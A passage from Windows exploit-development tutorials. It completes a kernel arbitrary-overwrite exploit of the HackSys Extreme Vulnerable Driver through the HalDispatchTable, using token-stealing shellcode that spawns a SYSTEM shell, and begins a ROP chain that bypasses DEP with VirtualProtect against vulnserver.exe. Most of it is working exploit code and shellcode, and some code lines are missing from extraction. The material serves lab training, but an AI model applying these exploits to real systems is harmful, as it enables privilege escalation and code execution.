from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

After setting up the debugging environment, run the POC. As you can see- What and Where have been cleanly overwritten!:

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode- without any check. In this case, however, things are not that straight forward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the address at HalDispatchTable + 0x4, is passed via KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode, when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntkornl.exe (ntoskrnl.exe exports KeQueryIntervalProfile())
  3. Load ntoskrnl.exe handle into LoadLibraryExA and then enumerate the HalDispatchTable address via GetProcAddress
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode


# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

This snippet of code enumerates the base addresses for the drivers, and exports them to an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe


# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.


# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"

In this snippet, LoadLibraryExA() receives the handle from GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case). It then proceeds, in the snippet below, to pass the handle loaded into memory (which is still ntoskrnl.exe) to the function GetProcAddress().


hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() will reveal to us the address of the HalDispatchTable and HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length

# Python, when using id to return a value, creates an offset of 20 bytes ot the value (first bytes reference variable)
# After id returns the value, it is then necessary to increase the returned value 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDEviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.

# Print update for nt_autority\system shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here, is where the What and Where come into play. We create a variable called write_what_where and we call the What pointer from the class created called WriteWhatWhere(). That value gets set to equal the address of a pointer to our shellcode. The same thing happens with Where, but it receives the value of HalDispatchTable + 0x4. And in the end, a pointer to the variable write_what_where, which has inherited all of our useful information about our pointer to the shellcode and HalDispatchTable + 0x4, is passed in the DeviceIoControl() function, which actually interacts with the driver.

One last thing. Take a peak here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.

The whole reason this exploit works in the first place, is because after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables- it does not matter. Our shellcode will be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that location of HalDispatchTable + 0x4 (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls HalDispatchTable + 0x4) gets executed. And then just like that- our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00


Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.


  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect

lpAddress = A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get ran?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

β€œHow is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each instruction is always followed by a ret instruction. Each ASM + ret instruction is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever is located in the stack pointer (on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening, until there are no more left! This makes life a bit easier.


Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f options specifies the file. The -r option specifies maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find a flOldProtect address. You can literally place any address in this parameter, that contains writeable permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

Before moving on, you may have noticed an arbitrary parameter variable for a parameter called return address added into the POC. This is not a part of the official parameters for VirtualProtect(). The reason this address is there (and right under the VirtualProtect() function) is because whenever the call to the function occurs, there needs to be a way to execute our shellcode. The address of return is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. The location of the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode will not be executed until we change the permissions of DEP. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite those parameters, we simply would like to β€œjump” over them for now. To do this, we can simply add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be a greater value than the current stack pointer (which currently contains the call to VirtualProtect()). This means we will be farther down in the stack (past the VirtualProtect() call). Since all of our ROP gadgets are ending with a ret, the new stack pointer (which is greater) will be loaded into EIP, because of the ret instruction in the add esp, VALUE + ret. This will make more sense in the screenshots that will be outlined below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take ESP (0xDEADBEEF) and load it into EIP. What this means, is that if successful, we will have successfully jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
